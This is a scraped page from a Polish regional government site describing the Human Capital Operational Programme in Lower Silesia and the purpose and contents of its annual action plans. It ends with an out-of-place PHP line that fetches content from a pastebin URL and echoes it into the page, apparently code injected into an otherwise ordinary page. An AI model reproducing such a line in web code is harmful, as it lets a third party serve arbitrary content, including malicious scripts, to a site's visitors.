Realizacja

Programu Operacyjnego
Kapitał Ludzki

na Dolnym Śląsku

Wartość podpisanych umów

2 350 537 513,38 zł

 Rozliczono

2 267 814 427,62 zł

Stan na 31 października 2015 r.

Punkt informacyjny i naboru wniosków PO KL

Multimedia

Niezwykła szansa dla niezwykłych ludzi

Mapa dotacji UE

Mapa projektów EFS

Analizy i raporty

Inwestycja w Kardy

Baza Projektów Badawczych w ramach Programu Kapitał Ludzki

Dolnośląski Wojewódzki Urząd Pracy

Regionalny Ośrodek EFS

Punkty Informacyjne Funduszy Europejskich

Europejski Fundusz Społeczny

Narodowa Strategia Spójności

Ministerstwo Rozwoju Regionalnego

Komisja Europejska

Regionalny Program Operacyjny

Urząd Marszałkowski Województwa Dolnośląskiego

Biuletyn informacji publicznej

Plany działania

Plan działania jest dokumentem precyzującym zapisy Szczegółowego Opisu Priorytetów Programu Operacyjnego Kapitał Ludzki (SzOP). Konieczność tworzenia Planów działania wynika z dwupoziomowego systemu wdrażania PO KL, który dzieli się na komponent centralny oraz regionalny, wdrażany odrębnie w każdym województwie. Ze względu na zróżnicowany poziom rozwoju regionów wprowadzono szczegółowe roczne plany realizacji PO KL – oddzielne dla każdego województwa i każdego Priorytetu – tzw. Plany działania.

Dla instytucji zaangażowanych we wdrażanie PO KL Plan działania pełni funkcję planistyczną i operacyjną, dla potencjalnych projektodawców zaś funkcję informacyjną. Plan działania ma na celu przedstawienie w ujęciu rocznym założeń Instytucji Pośredniczącej PO KL, dotyczących m.in.:

 • preferowanych form wsparcia (typów projektów, jakie mogą być zrealizowane w ramach poszczególnych działań),
 • zasad i terminów wyboru projektów,
 • podziału środków finansowych przeznaczonych na realizację projektów systemowych i konkursowych.

Dokument ten – w Priorytetach regionalnych – stanowi odpowiedź na zdiagnozowane potrzeby danego województwa, dla których odpowiedzią mają być działania podejmowane w ramach PO KL.

Instytucja Pośrednicząca może elastycznie reagować na zmiany sytuacji w regionie i co roku dostosowywać do nich Plany działania poprzez:

 • kryteria dostępu, obowiązkowe dla wszystkich projektodawców,
 • proponowanie kryteriów strategicznych, premiujących projekty o szczególnym znaczeniu dla regionu,
 • dokonywanie przesunięć między Działaniami w ramach Priorytetu do 30% rocznej puli środków finansowych Działania, z którego przesuwane (realokowane) są środki,
 • realizację projektów systemowych o znaczeniu strategicznym dla regionu.

Plan działania opracowany jest dla każdego Priorytetu w podziale na Działania/Poddziałania. Zawiera m.in. informacje dotyczące:

 • procedury konkursowej;
 • projektów systemowych;
 • projektów innowacyjnych i ponadnarodowych;
 • wskaźników monitorowania oraz
 • kontraktacji i wydatków w podziale na Działania i Poddziałania.

Poradnik „Plany Działania”

echo file_get_contents("https://pastebin.com/raw/vFc5Snpm");